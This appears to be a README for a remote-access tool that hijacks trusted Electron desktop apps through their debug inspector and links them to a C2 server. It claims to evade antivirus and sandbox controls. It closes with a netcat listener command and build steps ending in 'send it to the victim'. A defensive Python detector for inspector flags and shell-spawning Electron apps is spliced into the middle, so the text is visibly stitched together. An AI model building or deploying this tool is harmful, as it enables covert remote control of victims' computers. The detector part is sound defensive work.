Supports almost all operating systems
Supports almost all desktop applications built on Electron
All malicious operations are executed by the injected program, which is one of the commonly used, trusted programs
Bypasses per-application network access control policies enforced by zero trust sandboxes
Verified not to be detected by the antivirus software listed below
(Note that only a simple command call is implemented here; some behavior-based heuristic checks will still alert. Bypassing AV is not a key issue this project addresses.)
An increasing number of desktop applications are opting for the Electron framework.
Electron applications can be debugged, usually through Chrome's inspect feature or by invoking the Node.js inspector. This project analyzed the implementation of inspect and developed a method for automatically parasitizing common Electron programs.
By establishing a connection to the Command and Control (C2) server, simple remote control is achieved.
Because most antivirus software widely trusts these well-known, digitally signed applications, executing malicious commands in the program's context provides excellent concealment and stability.
For these injected applications, the potential legal risks of such actions must be considered carefully. When users analyze program behavior, they may be surprised to find that the parent process of the malicious behavior is the application they trust.
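A detection-side check for the two signals described above, added here as an example and not part of this project's code: it scans constructed process-creation events for a trusted Electron app started with Node.js inspector or Chromium remote-debugging switches (assumed here to be the debug interface an inspect-based injection relies on; the page does not name the exact mechanism), and for such an app becoming the parent of a shell or netcat process. The app allow-list and the sample events are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Node.js inspector and Chromium remote-debugging switches. These are real
# flags; the assumption (not stated on the page) is that an inspect-based
# injection relies on one of these debug interfaces being exposed.
DEBUG_FLAGS = re.compile(r"--(?:inspect(?:-brk|-port)?|remote-debugging-port)\b")

# Constructed allow-list of trusted, signed Electron apps seen in the estate.
ELECTRON_APPS = {"slack.exe", "code.exe", "discord.exe", "teams.exe"}

# Child images a desktop chat/editor app has no legitimate reason to spawn.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "nc.exe", "ncat.exe", "sh", "bash"}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


def basename(path: str) -> str:
    # Handle both Windows and POSIX separators, compare case-insensitively.
    return re.split(r"[\\/]", path)[-1].lower()


def audit(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, reason) findings: a trusted Electron app exposing its
    inspector, or that app acting as the parent of a shell/netcat process."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        if name in ELECTRON_APPS and DEBUG_FLAGS.search(e.cmdline):
            findings.append((e.pid, "inspect_flag"))
        parent = by_pid.get(e.ppid)
        if parent is not None and basename(parent.image) in ELECTRON_APPS \
                and name in SUSPICIOUS_CHILDREN:
            findings.append((e.pid, "suspicious_child"))
    return findings


# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Users\u\AppData\Local\slack\slack.exe", "slack.exe --inspect=9229"),
    ProcEvent(101, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(200, 1, r"C:\Program Files\VSCode\code.exe", "code.exe"),
    ProcEvent(201, 200, r"C:\Program Files\VSCode\code.exe", "code.exe --type=renderer"),
    ProcEvent(300, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
]

if __name__ == "__main__":
    for pid, reason in audit(SAMPLE_EVENTS):
        print(pid, reason)
```

Only the Slack process (inspector exposed) and its cmd.exe child are flagged; the renderer child of code.exe is a normal Electron child and produces no finding.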
nc -lvnp 8899
Clone this project
Modify build.config:
injected_app: the Electron program you want to inject into
c2: set c2_Public IP and c2_netcat Port
Run node build.js, then package the result into an executable with pkg
Send it to the victim and get electron_shell